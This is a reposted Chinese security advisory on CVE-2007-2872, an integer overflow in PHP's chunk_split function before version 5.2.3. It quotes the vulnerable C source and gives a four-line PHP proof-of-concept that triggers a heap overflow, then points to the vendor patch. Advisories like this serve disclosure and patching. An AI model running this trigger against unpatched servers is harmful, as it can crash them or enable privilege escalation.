ajax split len,split函数 PHP52下chunk_split函数整数溢出漏洞 分析

该文章详细分析了PHP 5.2.3之前版本的chunk_split函数存在的整数溢出漏洞,该漏洞可能导致本地攻击者提升权限。文章介绍了受影响和不受影响的系统版本,以及漏洞利用条件和内存分配错误的代码行。提供了测试方法、建议的补丁更新以及安全公告链接,帮助开发者理解和防范此类安全问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

受影响系统:

PHP PHP < 5.2.3

不受影响系统:

PHP PHP 5.2.3

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 24261

CVE(CAN) ID: CVE-2007-2872

PHP是一种流行的WEB服务器端编程语言。

PHP中的chunk_split函数在处理畸形参数时存在整数溢出漏洞,本地攻击者可能利用此漏洞提升自己的权限。

PHP中chunk_split函数的1963行试图为函数结果分配充分的内存大小,但没有执行任何检查便使用了srclen和chunklen参数块。如果值的块和endlen大于65534字节的话,就会触发整数溢出,分配错误的内存大小,导致堆溢出。

ext/standard/string.c:

1953 static char *php_chunk_split(char *src, int srclen, char *end,

int endlen, int chunklen, int *destlen)

1954 {

1955 char *dest;

1956 char *p, *q;

1957 int chunks; /* complete chunks! */

1958 int restlen;

1959

1960 chunks = srclen / chunklen;

1961 restlen = srclen - chunks * chunklen; /* srclen % chunklen */

1962

1963 dest = safe_emalloc((srclen + (chunks + 1) * endlen + 1),

sizeof(char), 0);

1964

1965 for (p = src, q = dest; p < (src + srclen - chunklen + 1); ) {

1966 memcpy(q, p, chunklen);

1967 q += chunklen;

1968 memcpy(q, end, endlen);

1969 q += endlen;

1970 p += chunklen;

1971 }

链接:http://marc.info/?l=bugtraq&m=118071054000708&w=2

http://www.php.net/releases/5_2_3.php

http://secunia.com/advisories/25456/

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

$a=str_repeat("A", 65535);

$b=1;

$c=str_repeat("A", 65535);

chunk_split($a,$b,$c);

?>

建议:

--------------------------------------------------------------------------------

厂商补丁:

PHP

---

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.php.net/downloads.php#v5

文章来自: 绿盟科技

以上就介绍了split函数 PHP52下chunk_split函数整数溢出漏洞 分析,包括了split函数方面的内容,希望对PHP教程有兴趣的朋友有所帮助。

声明:本文原创发布php中文网,转载请注明出处,感谢您的尊重!如有疑问,请联系admin@php.cn处理

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值